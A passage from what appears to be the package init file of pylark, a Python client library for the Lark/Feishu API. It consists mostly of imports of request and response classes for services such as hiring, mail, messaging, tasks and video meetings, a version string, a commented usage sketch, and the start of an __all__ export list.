from pylark.api_service_helpdesk_ticket_image_download import (
    DownloadHelpdeskTicketImageReq, DownloadHelpdeskTicketImageResp,
)
from pylark.api_service_helpdesk_ticket_message_get_list import (
    GetHelpdeskTicketMessageListReq, GetHelpdeskTicketMessageListRespMessage,
    GetHelpdeskTicketMessageListResp,
)
from pylark.api_service_helpdesk_ticket_message_send import (
    SendHelpdeskTicketMessageReq, SendHelpdeskTicketMessageResp,
)
from pylark.api_service_helpdesk_ticket_update import (
    UpdateHelpdeskTicketReqCustomizedField, UpdateHelpdeskTicketReq, UpdateHelpdeskTicketResp,
)
from pylark.api_service_hire import LarkHireService
from pylark.api_service_hire_application_create import (
    CreateHireApplicationReq, CreateHireApplicationResp,
)
from pylark.api_service_hire_application_get import (
    GetHireApplicationReq, GetHireApplicationRespApplicationStage, GetHireApplicationRespApplication,
    GetHireApplicationResp,
)
from pylark.api_service_hire_application_interview_list import (
    GetHireApplicationInterviewListReq,
    GetHireApplicationInterviewListRespItemInterviewRecordInterviewScore,
    GetHireApplicationInterviewListRespItemInterviewRecord,
    GetHireApplicationInterviewListRespItem,
    GetHireApplicationInterviewListResp,
)
from pylark.api_service_hire_application_list import (
    GetHireApplicationListReq, GetHireApplicationListResp,
)
from pylark.api_service_hire_application_terminate import (
    TerminateHireApplicationReq, TerminateHireApplicationResp,
)
from pylark.api_service_hire_attachment_get import (
    GetHireAttachmentReq, GetHireAttachmentRespAttachment, GetHireAttachmentResp,
)
from pylark.api_service_hire_attachment_preview_get import (
    GetHireAttachmentPreviewReq, GetHireAttachmentPreviewResp,
)
from pylark.api_service_hire_employee_get import (
    GetHireEmployeeReq, GetHireEmployeeRespEmployee, GetHireEmployeeResp,
)
from pylark.api_service_hire_employee_get_by_application import (
    GetHireEmployeeByApplicationReq, GetHireEmployeeByApplicationRespEmployee,
    GetHireEmployeeByApplicationResp,
)
from pylark.api_service_hire_employee_update import (
    UpdateHireEmployeeReqOverboardInfo, UpdateHireEmployeeReqConversionInfo, UpdateHireEmployeeReq,
    UpdateHireEmployeeRespEmployee, UpdateHireEmployeeResp,
)
from pylark.api_service_hire_job_get import (
    GetHireJobReq,
    GetHireJobRespJobCustomizedDataValueTimeRange,
    GetHireJobRespJobCustomizedDataValueOptionName,
    GetHireJobRespJobCustomizedDataValueOption,
    GetHireJobRespJobCustomizedDataValue,
    GetHireJobRespJobCustomizedDataName,
    GetHireJobRespJobCustomizedData,
    GetHireJobRespJobJobType,
    GetHireJobRespJobJobCategory,
    GetHireJobRespJobHighlight,
    GetHireJobRespJobMaxJobLevel,
    GetHireJobRespJobMinJobLevel,
    GetHireJobRespJobCity,
    GetHireJobRespJobDepartment,
    GetHireJobRespJobRecruitmentType,
    GetHireJobRespJob,
    GetHireJobResp,
)
from pylark.api_service_hire_job_manager_get import (
    GetHireJobManagerReq, GetHireJobManagerRespInfo, GetHireJobManagerResp,
)
from pylark.api_service_hire_job_process_list import (
    GetHireJobProcessListReq, GetHireJobProcessListRespItemStage, GetHireJobProcessListRespItem,
    GetHireJobProcessListResp,
)
from pylark.api_service_hire_note_create import (
    CreateHireNoteReq, CreateHireNoteRespNote, CreateHireNoteResp,
)
from pylark.api_service_hire_note_get import (
    GetHireNoteReq, GetHireNoteRespNote, GetHireNoteResp,
)
from pylark.api_service_hire_note_list import (
    GetHireNoteListReq, GetHireNoteListRespItem, GetHireNoteListResp,
)
from pylark.api_service_hire_note_update import (
    UpdateHireNoteReq, UpdateHireNoteRespNote, UpdateHireNoteResp,
)
from pylark.api_service_hire_offer_get_by_application import (
    GetHireOfferByApplicationReq,
    GetHireOfferByApplicationRespOfferSalaryPlanCustomizeInfo,
    GetHireOfferByApplicationRespOfferSalaryPlan,
    GetHireOfferByApplicationRespOfferBasicInfoCustomizeInfo,
    GetHireOfferByApplicationRespOfferBasicInfoWorkAddressCountry,
    GetHireOfferByApplicationRespOfferBasicInfoWorkAddressState,
    GetHireOfferByApplicationRespOfferBasicInfoWorkAddressCity,
    GetHireOfferByApplicationRespOfferBasicInfoWorkAddressDistrict,
    GetHireOfferByApplicationRespOfferBasicInfoWorkAddress,
    GetHireOfferByApplicationRespOfferBasicInfoOnboardAddressCountry,
    GetHireOfferByApplicationRespOfferBasicInfoOnboardAddressState,
    GetHireOfferByApplicationRespOfferBasicInfoOnboardAddressCity,
    GetHireOfferByApplicationRespOfferBasicInfoOnboardAddressDistrict,
    GetHireOfferByApplicationRespOfferBasicInfoOnboardAddress,
    GetHireOfferByApplicationRespOfferBasicInfoLevel,
    GetHireOfferByApplicationRespOfferBasicInfoSequence,
    GetHireOfferByApplicationRespOfferBasicInfoRecruitmentType,
    GetHireOfferByApplicationRespOfferBasicInfo,
    GetHireOfferByApplicationRespOffer,
    GetHireOfferByApplicationResp,
)
from pylark.api_service_hire_offer_schema_get import (
    GetHireOfferSchemaReq, GetHireOfferSchemaRespObjectOptionName, GetHireOfferSchemaRespObjectOption,
    GetHireOfferSchemaRespObjectName, GetHireOfferSchemaRespObject, GetHireOfferSchemaResp,
)
from pylark.api_service_hire_referral_get_by_application import (
    GetHireReferralByApplicationReq, GetHireReferralByApplicationRespReferral,
    GetHireReferralByApplicationResp,
)
from pylark.api_service_hire_resume_sources_get import (
    GetHireResumeSourceReq, GetHireResumeSourceRespItem, GetHireResumeSourceResp,
)
from pylark.api_service_hire_talent_get import (
    GetHireTalentReq,
    GetHireTalentRespTalentInterviewRegistration,
    GetHireTalentRespTalentResumeSource,
    GetHireTalentRespTalentSns,
    GetHireTalentRespTalentLanguage,
    GetHireTalentRespTalentCertificate,
    GetHireTalentRespTalentCompetition,
    GetHireTalentRespTalentAward,
    GetHireTalentRespTalentWorks,
    GetHireTalentRespTalentProject,
    GetHireTalentRespTalentCareer,
    GetHireTalentRespTalentEducation,
    GetHireTalentRespTalentBasicInfoPreferredCity,
    GetHireTalentRespTalentBasicInfoHometownCity,
    GetHireTalentRespTalentBasicInfoCurrentCity,
    GetHireTalentRespTalentBasicInfoNationality,
    GetHireTalentRespTalentBasicInfo,
    GetHireTalentRespTalent,
    GetHireTalentResp,
)
from pylark.api_service_hire_transfer_onboard_by_application import (
    MakeHireTransferOnboardByApplicationReq, MakeHireTransferOnboardByApplicationResp,
)
from pylark.api_service_human_auth import LarkHumanAuthService
from pylark.api_service_human_auth_face_verify_crop_image import (
    CropFaceVerifyImageReq, CropFaceVerifyImageResp,
)
from pylark.api_service_human_auth_face_verify_get_auth_result import (
    GetFaceVerifyAuthResultReq, GetFaceVerifyAuthResultResp,
)
from pylark.api_service_human_auth_face_verify_upload_image import (
    UploadFaceVerifyImageReq, UploadFaceVerifyImageResp,
)
from pylark.api_service_human_auth_identity import CreateIdentityReq, CreateIdentityResp
from pylark.api_service_jssdk import LarkJssdkService
from pylark.api_service_jssdk_ticket_get import GetJssdkTicketReq, GetJssdkTicketResp
from pylark.api_service_link_open_bot import OpenBotReq, OpenBotResp
from pylark.api_service_link_open_calender import OpenCalenderReq, OpenCalenderResp
from pylark.api_service_link_open_calender_account import (
    OpenCalenderAccountReq, OpenCalenderAccountResp,
)
from pylark.api_service_link_open_calender_event_create import (
    OpenCalenderEventCreateReq, OpenCalenderEventCreateResp,
)
from pylark.api_service_link_open_calender_view import (
    OpenCalenderViewReq, OpenCalenderViewResp,
)
from pylark.api_service_link_open_chat import OpenChatReq, OpenChatResp
from pylark.api_service_link_open_docs import OpenDocsReq, OpenDocsResp
from pylark.api_service_link_open_lark import OpenLarkReq, OpenLarkResp
from pylark.api_service_link_open_mini_program import (
    OpenMiniProgramReq, OpenMiniProgramResp,
)
from pylark.api_service_link_open_sso_login import OpenSSOLoginReq, OpenSSOLoginResp
from pylark.api_service_link_open_web_app import OpenWebAppReq, OpenWebAppResp
from pylark.api_service_link_open_web_url import OpenWebURLReq, OpenWebURLResp
from pylark.api_service_mail import LarkMailService
from pylark.api_service_mail_mail_group_create import (
    CreateMailGroupReq, CreateMailGroupResp,
)
from pylark.api_service_mail_mail_group_delete import (
    DeleteMailGroupReq, DeleteMailGroupResp,
)
from pylark.api_service_mail_mail_group_get import GetMailGroupReq, GetMailGroupResp
from pylark.api_service_mail_mail_group_get_list import (
    GetMailGroupListReq, GetMailGroupListRespItem, GetMailGroupListResp,
)
from pylark.api_service_mail_mail_group_member_create import (
    CreateMailGroupMemberReq, CreateMailGroupMemberResp,
)
from pylark.api_service_mail_mail_group_member_delete import (
    DeleteMailGroupMemberReq, DeleteMailGroupMemberResp,
)
from pylark.api_service_mail_mail_group_member_get import (
    GetMailGroupMemberReq, GetMailGroupMemberResp,
)
from pylark.api_service_mail_mail_group_member_get_list import (
    GetMailGroupMemberListReq, GetMailGroupMemberListRespItem, GetMailGroupMemberListResp,
)
from pylark.api_service_mail_mail_group_patch import (
    UpdateMailGroupPatchReq, UpdateMailGroupPatchResp,
)
from pylark.api_service_mail_mail_group_permission_member_create import (
    CreateMailGroupPermissionMemberReq, CreateMailGroupPermissionMemberResp,
)
from pylark.api_service_mail_mail_group_permission_member_delete import (
    DeleteMailGroupPermissionMemberReq, DeleteMailGroupPermissionMemberResp,
)
from pylark.api_service_mail_mail_group_permission_member_get import (
    GetMailGroupPermissionMemberReq, GetMailGroupPermissionMemberResp,
)
from pylark.api_service_mail_mail_group_permission_member_get_list import (
    GetMailGroupPermissionMemberListReq, GetMailGroupPermissionMemberListRespItem,
    GetMailGroupPermissionMemberListResp,
)
from pylark.api_service_mail_mail_group_update import (
    UpdateMailGroupReq, UpdateMailGroupResp,
)
from pylark.api_service_mail_public_mailbox_create import (
    CreatePublicMailboxReq, CreatePublicMailboxResp,
)
from pylark.api_service_mail_public_mailbox_delete import (
    DeletePublicMailboxReq, DeletePublicMailboxResp,
)
from pylark.api_service_mail_public_mailbox_get import (
    GetPublicMailboxReq, GetPublicMailboxResp,
)
from pylark.api_service_mail_public_mailbox_get_list import (
    GetPublicMailboxListReq, GetPublicMailboxListRespItem, GetPublicMailboxListResp,
)
from pylark.api_service_mail_public_mailbox_member_clear import (
    ClearPublicMailboxMemberReq, ClearPublicMailboxMemberResp,
)
from pylark.api_service_mail_public_mailbox_member_create import (
    CreatePublicMailboxMemberReq, CreatePublicMailboxMemberResp,
)
from pylark.api_service_mail_public_mailbox_member_delete import (
    DeletePublicMailboxMemberReq, DeletePublicMailboxMemberResp,
)
from pylark.api_service_mail_public_mailbox_member_get import (
    GetPublicMailboxMemberReq, GetPublicMailboxMemberResp,
)
from pylark.api_service_mail_public_mailbox_member_get_list import (
    GetPublicMailboxMemberListReq, GetPublicMailboxMemberListRespItem, GetPublicMailboxMemberListResp,
)
from pylark.api_service_mail_public_mailbox_patch import (
    UpdatePublicMailboxPatchReq, UpdatePublicMailboxPatchResp,
)
from pylark.api_service_mail_public_mailbox_update import (
    UpdatePublicMailboxReq, UpdatePublicMailboxResp,
)
from pylark.api_service_meeting_room import LarkMeetingRoomService
from pylark.api_service_meeting_room_building_batch_get import (
    BatchGetMeetingRoomBuildingReq, BatchGetMeetingRoomBuildingRespBuilding,
    BatchGetMeetingRoomBuildingResp,
)
from pylark.api_service_meeting_room_building_batch_get_id import (
    BatchGetMeetingRoomBuildingIDReq, BatchGetMeetingRoomBuildingIDRespBuilding,
    BatchGetMeetingRoomBuildingIDResp,
)
from pylark.api_service_meeting_room_building_create import (
    CreateMeetingRoomBuildingReq, CreateMeetingRoomBuildingResp,
)
from pylark.api_service_meeting_room_building_delete import (
    DeleteMeetingRoomBuildingReq, DeleteMeetingRoomBuildingResp,
)
from pylark.api_service_meeting_room_building_get_list import (
    GetMeetingRoomBuildingListReq, GetMeetingRoomBuildingListRespBuilding,
    GetMeetingRoomBuildingListResp,
)
from pylark.api_service_meeting_room_building_update import (
    UpdateMeetingRoomBuildingReq, UpdateMeetingRoomBuildingResp,
)
from pylark.api_service_meeting_room_country_get_list import (
    GetMeetingRoomCountryListReq, GetMeetingRoomCountryListRespCountries,
    GetMeetingRoomCountryListResp,
)
from pylark.api_service_meeting_room_district_get_list import (
    GetMeetingRoomDistrictListReq, GetMeetingRoomDistrictListRespDistricts,
    GetMeetingRoomDistrictListResp,
)
from pylark.api_service_meeting_room_freebusy_batch_get import (
    BatchGetMeetingRoomFreebusyReq,
    BatchGetMeetingRoomFreebusyRespFreeBusyRoomIDOrganizerInfo,
    BatchGetMeetingRoomFreebusyRespFreeBusyRoomID,
    BatchGetMeetingRoomFreebusyRespFreeBusy,
    BatchGetMeetingRoomFreebusyResp,
)
from pylark.api_service_meeting_room_instance_reply import (
    ReplyMeetingRoomInstanceReq, ReplyMeetingRoomInstanceResp,
)
from pylark.api_service_meeting_room_room_batch_get import (
    BatchGetMeetingRoomRoomReq, BatchGetMeetingRoomRoomRespRoom, BatchGetMeetingRoomRoomResp,
)
from pylark.api_service_meeting_room_room_batch_get_id import (
    BatchGetMeetingRoomRoomIDReq, BatchGetMeetingRoomRoomIDRespRoom, BatchGetMeetingRoomRoomIDResp,
)
from pylark.api_service_meeting_room_room_create import (
    CreateMeetingRoomRoomReq, CreateMeetingRoomRoomResp,
)
from pylark.api_service_meeting_room_room_delete import (
    DeleteMeetingRoomRoomReq, DeleteMeetingRoomRoomResp,
)
from pylark.api_service_meeting_room_room_get_list import (
    GetMeetingRoomRoomListReq, GetMeetingRoomRoomListRespRoom, GetMeetingRoomRoomListResp,
)
from pylark.api_service_meeting_room_room_update import (
    UpdateMeetingRoomRoomReq, UpdateMeetingRoomRoomResp,
)
from pylark.api_service_meeting_room_summary_batch_get import (
    BatchGetMeetingRoomSummaryReqEventUid, BatchGetMeetingRoomSummaryReq,
    BatchGetMeetingRoomSummaryRespErrorEventUid, BatchGetMeetingRoomSummaryRespEventInfo,
    BatchGetMeetingRoomSummaryResp,
)
from pylark.api_service_message import LarkMessageService
from pylark.api_service_message_batch_delete import (
    BatchDeleteMessageReq, BatchDeleteMessageResp,
)
from pylark.api_service_message_batch_send_old import (
    BatchSendOldRawMessageReq, BatchSendOldRawMessageResp,
)
from pylark.api_service_message_delete import DeleteMessageReq, DeleteMessageResp
from pylark.api_service_message_ephemeral_delete import (
    DeleteEphemeralMessageReq, DeleteEphemeralMessageResp,
)
from pylark.api_service_message_get import (
    GetMessageReq, GetMessageRespItem, GetMessageResp,
)
from pylark.api_service_message_get_batch_msg_read_user import (
    GetBatchSentMessageReadUserReq, GetBatchSentMessageReadUserRespReadUser,
    GetBatchSentMessageReadUserResp,
)
from pylark.api_service_message_get_file import (
    GetMessageFileReq, GetMessageFileResp,
)
from pylark.api_service_message_get_read_user_list import (
    GetMessageReadUserListReq, GetMessageReadUserListRespItem, GetMessageReadUserListResp,
)
from pylark.api_service_message_list import (
    GetMessageListReq, GetMessageListRespItem, GetMessageListResp,
)
from pylark.api_service_message_reply import ReplyRawMessageReq, ReplyRawMessageResp
from pylark.api_service_message_send import SendRawMessageReq, SendRawMessageResp
from pylark.api_service_message_send_ephemeral import (
    SendEphemeralMessageReq, SendEphemeralMessageResp,
)
from pylark.api_service_message_send_old import (
    SendRawMessageOldReqContent, SendRawMessageOldReq, SendRawMessageOldResp,
)
from pylark.api_service_message_send_urgent_app import (
    SendUrgentAppMessageReq, SendUrgentAppMessageResp,
)
from pylark.api_service_message_send_urgent_phone import (
    SendUrgentPhoneMessageReq, SendUrgentPhoneMessageResp,
)
from pylark.api_service_message_send_urgent_sms import (
    SendUrgentSmsMessageReq, SendUrgentSmsMessageResp,
)
from pylark.api_service_message_update import UpdateMessageReq, UpdateMessageResp
from pylark.api_service_okr import LarkOKRService
from pylark.api_service_okr_okr_batch_get import (
    BatchGetOKRReq,
    BatchGetOKRRespOKRObjectiveAligningObjectiveOwner,
    BatchGetOKRRespOKRObjectiveAligningObjective,
    BatchGetOKRRespOKRObjectiveAlignedObjectiveOwner,
    BatchGetOKRRespOKRObjectiveAlignedObjective,
    BatchGetOKRRespOKRObjectiveKrProgressRate,
    BatchGetOKRRespOKRObjectiveKr,
    BatchGetOKRRespOKRObjectiveProgressRate,
    BatchGetOKRRespOKRObjective,
    BatchGetOKRRespOKR,
    BatchGetOKRResp,
)
from pylark.api_service_okr_period_get_list import (
    GetOKRPeriodListReq, GetOKRPeriodListRespItem, GetOKRPeriodListResp,
)
from pylark.api_service_okr_user_okr_get_list import (
    GetUserOKRListReq,
    GetUserOKRListRespOKRObjectiveAligningObjectiveOwner,
    GetUserOKRListRespOKRObjectiveAligningObjective,
    GetUserOKRListRespOKRObjectiveAlignedObjectiveOwner,
    GetUserOKRListRespOKRObjectiveAlignedObjective,
    GetUserOKRListRespOKRObjectiveKrProgressRate,
    GetUserOKRListRespOKRObjectiveKr,
    GetUserOKRListRespOKRObjectiveProgressRate,
    GetUserOKRListRespOKRObjective,
    GetUserOKRListRespOKR,
    GetUserOKRListResp,
)
from pylark.api_service_search import LarkSearchService
from pylark.api_service_search_data_source_create import (
    CreateSearchDataSourceReq, CreateSearchDataSourceRespDataSource, CreateSearchDataSourceResp,
)
from pylark.api_service_search_data_source_delete import (
    DeleteSearchDataSourceReq, DeleteSearchDataSourceResp,
)
from pylark.api_service_search_data_source_get import (
    GetSearchDataSourceReq, GetSearchDataSourceRespDataSource, GetSearchDataSourceResp,
)
from pylark.api_service_search_data_source_item_create import (
    CreateSearchDataSourceItemReqContent, CreateSearchDataSourceItemReqMetadata,
    CreateSearchDataSourceItemReqACL, CreateSearchDataSourceItemReq, CreateSearchDataSourceItemResp,
)
from pylark.api_service_search_data_source_item_delete import (
    DeleteSearchDataSourceItemReq, DeleteSearchDataSourceItemResp,
)
from pylark.api_service_search_data_source_item_get import (
    GetSearchDataSourceItemReq, GetSearchDataSourceItemRespItemContent,
    GetSearchDataSourceItemRespItemMetadata, GetSearchDataSourceItemRespItemACL,
    GetSearchDataSourceItemRespItem, GetSearchDataSourceItemResp,
)
from pylark.api_service_search_data_source_list import (
    GetSearchDataSourceListReq, GetSearchDataSourceListRespItem, GetSearchDataSourceListResp,
)
from pylark.api_service_search_data_source_patch import (
    UpdateSearchDataSourceReq, UpdateSearchDataSourceRespDataSource, UpdateSearchDataSourceResp,
)
from pylark.api_service_task import LarkTaskService
from pylark.api_service_task_collaborator_create import (
    CreateTaskCollaboratorReq, CreateTaskCollaboratorRespCollaborator, CreateTaskCollaboratorResp,
)
from pylark.api_service_task_collaborator_delete import (
    DeleteTaskCollaboratorReq, DeleteTaskCollaboratorResp,
)
from pylark.api_service_task_collaborator_list import (
    GetTaskCollaboratorListReq, GetTaskCollaboratorListRespItem, GetTaskCollaboratorListResp,
)
from pylark.api_service_task_comment_create import (
    CreateTaskCommentReq, CreateTaskCommentRespComment, CreateTaskCommentResp,
)
from pylark.api_service_task_comment_delete import (
    DeleteTaskCommentReq, DeleteTaskCommentResp,
)
from pylark.api_service_task_comment_get import (
    GetTaskCommentReq, GetTaskCommentRespComment, GetTaskCommentResp,
)
from pylark.api_service_task_comment_update import (
    UpdateTaskCommentReq, UpdateTaskCommentRespComment, UpdateTaskCommentResp,
)
from pylark.api_service_task_follower_create import (
    CreateTaskFollowerReq, CreateTaskFollowerRespFollower, CreateTaskFollowerResp,
)
from pylark.api_service_task_follower_delete import (
    DeleteTaskFollowerReq, DeleteTaskFollowerResp,
)
from pylark.api_service_task_follower_list import (
    GetTaskFollowerListReq, GetTaskFollowerListRespItem, GetTaskFollowerListResp,
)
from pylark.api_service_task_reminder_create import (
    CreateTaskReminderReq, CreateTaskReminderRespReminder, CreateTaskReminderResp,
)
from pylark.api_service_task_reminder_delete import (
    DeleteTaskReminderReq, DeleteTaskReminderResp,
)
from pylark.api_service_task_reminder_list import (
    GetTaskReminderListReq, GetTaskReminderListRespItem, GetTaskReminderListResp,
)
from pylark.api_service_task_task import (
    GetTaskReq, GetTaskRespTaskOriginHref, GetTaskRespTaskOrigin, GetTaskRespTaskDue,
    GetTaskRespTask, GetTaskResp,
)
from pylark.api_service_task_task_complete import CompleteTaskReq, CompleteTaskResp
from pylark.api_service_task_task_create import (
    CreateTaskReqOriginHref, CreateTaskReqOrigin, CreateTaskReqDue, CreateTaskReq,
    CreateTaskRespTaskOriginHref, CreateTaskRespTaskOrigin, CreateTaskRespTaskDue,
    CreateTaskRespTask, CreateTaskResp,
)
from pylark.api_service_task_task_delete import DeleteTaskReq, DeleteTaskResp
from pylark.api_service_task_task_uncomplete import (
    UncompleteTaskReq, UncompleteTaskResp,
)
from pylark.api_service_task_task_update import (
    UpdateTaskReqTaskOriginHref, UpdateTaskReqTaskOrigin, UpdateTaskReqTaskDue, UpdateTaskReqTask,
    UpdateTaskReq, UpdateTaskRespTaskOriginHref, UpdateTaskRespTaskOrigin, UpdateTaskRespTaskDue,
    UpdateTaskRespTask, UpdateTaskResp,
)
from pylark.api_service_tenant import LarkTenantService
from pylark.api_service_tenant_tenant_get import (
    GetTenantReq, GetTenantRespTenantAvatar, GetTenantRespTenant, GetTenantResp,
)
from pylark.api_service_vc import LarkVCService
from pylark.api_service_vc_meeting_end import EndVCMeetingReq, EndVCMeetingResp
from pylark.api_service_vc_meeting_get import (
    GetVCMeetingReq, GetVCMeetingRespMeetingAbility, GetVCMeetingRespMeetingParticipant,
    GetVCMeetingRespMeetingHostUser, GetVCMeetingRespMeeting, GetVCMeetingResp,
)
from pylark.api_service_vc_meeting_invite import (
    InviteVCMeetingReqInvitee, InviteVCMeetingReq, InviteVCMeetingRespInviteResult,
    InviteVCMeetingResp,
)
from pylark.api_service_vc_meeting_kickout import (
    KickoutVCMeetingReqKickoutUser, KickoutVCMeetingReq, KickoutVCMeetingRespKickoutResult,
    KickoutVCMeetingResp,
)
from pylark.api_service_vc_meeting_recording_get import (
    GetVCMeetingRecordingReq, GetVCMeetingRecordingRespRecording, GetVCMeetingRecordingResp,
)
from pylark.api_service_vc_meeting_recording_set_permission import (
    SetVCPermissionMeetingRecordingReqPermissionObject, SetVCPermissionMeetingRecordingReq,
    SetVCPermissionMeetingRecordingResp,
)
from pylark.api_service_vc_meeting_recording_start import (
    StartVCMeetingRecordingReq, StartVCMeetingRecordingResp,
)
from pylark.api_service_vc_meeting_recording_stop import (
    StopVCMeetingRecordingReq, StopVCMeetingRecordingResp,
)
from pylark.api_service_vc_meeting_set_host import (
    SetVCHostMeetingReqOldHostUser, SetVCHostMeetingReqHostUser, SetVCHostMeetingReq,
    SetVCHostMeetingRespHostUser, SetVCHostMeetingResp,
)
from pylark.api_service_vc_report_get_daily import (
    GetVCDailyReportReq, GetVCDailyReportRespMeetingReportDailyReport,
    GetVCDailyReportRespMeetingReport, GetVCDailyReportResp,
)
from pylark.api_service_vc_report_get_top_user import (
    GetVCTopUserReportReq, GetVCTopUserReportRespTopUserReport, GetVCTopUserReportResp,
)
from pylark.api_service_vc_reserve_apply import (
    ApplyVCReserveReqMeetingSettingsCallSettingCalleePstnSipInfo,
    ApplyVCReserveReqMeetingSettingsCallSettingCallee,
    ApplyVCReserveReqMeetingSettingsCallSetting,
    ApplyVCReserveReqMeetingSettingsActionPermissionPermissionChecker,
    ApplyVCReserveReqMeetingSettingsActionPermission,
    ApplyVCReserveReqMeetingSettings,
    ApplyVCReserveReq,
    ApplyVCReserveRespReserve,
    ApplyVCReserveResp,
)
from pylark.api_service_vc_reserve_delete import DeleteVCReserveReq, DeleteVCReserveResp
from pylark.api_service_vc_reserve_get import (
    GetVCReserveReq,
    GetVCReserveRespReserveMeetingSettingsCallSettingCalleePstnSipInfo,
    GetVCReserveRespReserveMeetingSettingsCallSettingCallee,
    GetVCReserveRespReserveMeetingSettingsCallSetting,
    GetVCReserveRespReserveMeetingSettingsActionPermissionPermissionChecker,
    GetVCReserveRespReserveMeetingSettingsActionPermission,
    GetVCReserveRespReserveMeetingSettings,
    GetVCReserveRespReserve,
    GetVCReserveResp,
)
from pylark.api_service_vc_reserve_get_active_meeting import (
    GetVCReserveActiveMeetingReq,
    GetVCReserveActiveMeetingRespMeetingAbility,
    GetVCReserveActiveMeetingRespMeetingParticipant,
    GetVCReserveActiveMeetingRespMeetingHostUser,
    GetVCReserveActiveMeetingRespMeeting,
    GetVCReserveActiveMeetingResp,
)
from pylark.api_service_vc_reserve_update import (
    UpdateVCReserveReqMeetingSettingsCallSettingCalleePstnSipInfo,
    UpdateVCReserveReqMeetingSettingsCallSettingCallee,
    UpdateVCReserveReqMeetingSettingsCallSetting,
    UpdateVCReserveReqMeetingSettingsActionPermissionPermissionChecker,
    UpdateVCReserveReqMeetingSettingsActionPermission,
    UpdateVCReserveReqMeetingSettings,
    UpdateVCReserveReq,
    UpdateVCReserveRespReserve,
    UpdateVCReserveResp,
)
from pylark.api_service_vc_room_config_get import (
    GetVCRoomConfigReq, GetVCRoomConfigRespDigitalSignageMaterial,
    GetVCRoomConfigRespDigitalSignage, GetVCRoomConfigResp,
)
from pylark.api_service_vc_room_config_set import (
    SetVCRoomConfigReqRoomConfigDigitalSignageMaterial, SetVCRoomConfigReqRoomConfigDigitalSignage,
    SetVCRoomConfigReqRoomConfig, SetVCRoomConfigReq, SetVCRoomConfigResp,
)
from pylark.lark import Lark
from pylark.lark_exception import PyLarkError
from pylark.lark_request import Response, MethodOption, RawRequestReq, Request
from pylark.lark_type import (
    MsgType, ContainerIDType, IDType, DepartmentIDType, MailUserType, EmployeeType, ChatType,
    ImageType, FileType, CalendarRole, CalendarEventAttendeeType, CalendarType, CalendarPermission,
    AddMemberPermission, MessageVisibility, MembershipApproval, ModerationPermission,
    ShareCardPermission, AtAllPermission, EditPermission, HelpdeskDropdownOption,
)
from pylark.lark_type_approval import (
    ApprovalWidgetType, ApprovalWidget, ApprovalWidgetOption, ApprovalWidgetList,
)
from pylark.lark_type_message_post import (
    MessageContentPostItem, MessageContentPost, MessageContentPostAll,
)
from pylark.lark_type_sheet import SheetContent, SheetRuleAttr
from pylark._internal_log import logger

__version__ = "0.0.13"
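# Usage sketch (comments only, so nothing here runs at import time). A minimal
# illustration of how the exports above fit together, assuming the Lark client
# accepts app credentials as keyword arguments and that each service method
# takes the matching *Req object and returns the matching *Resp object. The
# exact constructor and method names live in lark.py and the api_service_*
# modules, so treat the call shape below as hypothetical:
#
#     from pylark import Lark, PyLarkError, SendRawMessageReq
#
#     cli = Lark(app_id="<app-id>", app_secret="<app-secret>")
#     try:
#         resp = cli.message.send(SendRawMessageReq(...))  # hypothetical call shape
#     except PyLarkError as e:
#         logger.error("request failed: %s", e)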
__all__ = [
    LarkACSService,
    GetACSAccessRecordListReq, GetACSAccessRecordListRespItem, GetACSAccessRecordListResp,
    GetACSAccessRecordPhotoReq, GetACSAccessRecordPhotoResp,
    GetACSDeviceListReq, GetACSDeviceListRespItem, GetACSDeviceListResp,
    GetACSUserFaceReq, GetACSUserFaceResp, UpdateACSUserFaceReq, UpdateACSUserFaceResp,
    GetACSUserReq, GetACSUserRespUserFeature, GetACSUserRespUser, GetACSUserResp,
    GetACSUserListReq, GetACSUserListRespItemFeature, GetACSUserListRespItem, GetACSUserListResp,
    UpdateACSUserReqFeature, UpdateACSUserReq, UpdateACSUserResp,
    LarkAdminService,
    GetAdminDeptStatsReq, GetAdminDeptStatsRespItem, GetAdminDeptStatsResp,
    GetAdminUserStatsReq, GetAdminUserStatsRespItem, GetAdminUserStatsResp,
    LarkAIService,
    DetectFaceAttributesReq, DetectFaceAttributesRespFaceInfoQualityOcclude,
    DetectFaceAttributesRespFaceInfoQuality, DetectFaceAttributesRespFaceInfoAttributeMask,
    DetectFaceAttributesRespFaceInfoAttributeGlass, DetectFaceAttributesRespFaceInfoAttributeHat,
    DetectFaceAttributesRespFaceInfoAttributePose, DetectFaceAttributesRespFaceInfoAttributeEmotion,
    DetectFaceAttributesRespFaceInfoAttributeGender, DetectFaceAttributesRespFaceInfoAttribute,
    DetectFaceAttributesRespFaceInfoPositionLowerRight, DetectFaceAttributesRespFaceInfoPositionUpperLeft,
    DetectFaceAttributesRespFaceInfoPosition, DetectFaceAttributesRespFaceInfo,
    DetectFaceAttributesRespImageInfo, DetectFaceAttributesResp,
    DetectTextLanguageReq, DetectTextLanguageResp,
    RecognizeBasicImageReq, RecognizeBasicImageResp,
    RecognizeSpeechFileReqConfig, RecognizeSpeechFileReqSpeech, RecognizeSpeechFileReq,
    RecognizeSpeechFileResp, RecognizeSpeechStreamReqConfig, RecognizeSpeechStreamReqSpeech,
    RecognizeSpeechStreamReq, RecognizeSpeechStreamResp,
    TranslateTextReqGlossary, TranslateTextReq, TranslateTextResp,
    LarkApplicationService,
    GetApplicationAppAdminUserListReq, GetApplicationAppAdminUserListRespUserOpenID,
    GetApplicationAppAdminUserListRespUser, GetApplicationAppAdminUserListResp,
    GetApplicationAppListReq, GetApplicationAppListRespAppList, GetApplicationAppListResp,
    GetApplicationAppVisibilityReq, GetApplicationAppVisibilityRespUser,
    GetApplicationAppVisibilityRespDepartment, GetApplicationAppVisibilityResp,
    UpdateApplicationAppVisibilityReqAddUsers, UpdateApplicationAppVisibilityReqDelUsers,
    UpdateApplicationAppVisibilityReq, UpdateApplicationAppVisibilityResp,
    IsApplicationUserAdminReq, IsApplicationUserAdminResp,
    GetApplicationMessageDetailReq, GetApplicationMessageDetailRespUsersRead,
    GetApplicationMessageDetailRespTarget, GetApplicationMessageDetailResp,
    GetApplicationMessageOverviewReq, GetApplicationMessageOverviewRespGroupReadPv,
    GetApplicationMessageOverviewRespGroupRead, GetApplicationMessageOverviewRespGroupReceivedPv,
    GetApplicationMessageOverviewRespGroupReceived, GetApplicationMessageOverviewRespGroupSentPv,
    GetApplicationMessageOverviewRespGroupSent, GetApplicationMessageOverviewRespP2pReadPv,
    GetApplicationMessageOverviewRespP2pRead, GetApplicationMessageOverviewRespP2pReceivedPv,
    GetApplicationMessageOverviewRespP2pReceived, GetApplicationMessageOverviewRespP2pSentPv,
